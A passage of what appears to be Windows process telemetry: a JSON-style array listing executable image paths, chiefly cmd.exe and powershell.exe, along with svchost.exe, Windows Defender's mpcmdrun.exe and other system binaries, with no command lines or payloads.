c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c